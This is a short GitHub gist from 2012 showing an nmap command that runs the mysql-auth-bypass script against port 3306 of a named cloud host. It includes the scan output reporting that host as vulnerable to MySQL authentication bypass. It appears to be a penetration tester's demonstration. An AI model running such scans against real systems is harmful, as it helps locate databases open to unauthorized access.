Skip to content

Instantly share code, notes, and snippets.

@marcwickenden
Created June 12, 2012 15:46
Show Gist options
  • Save marcwickenden/2918310 to your computer and use it in GitHub Desktop.
Save marcwickenden/2918310 to your computer and use it in GitHub Desktop.
mysql-auth-bypass nmap
# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up (0.050s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-auth-bypass:
|_ user nse is vulnerable to auth bypass
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment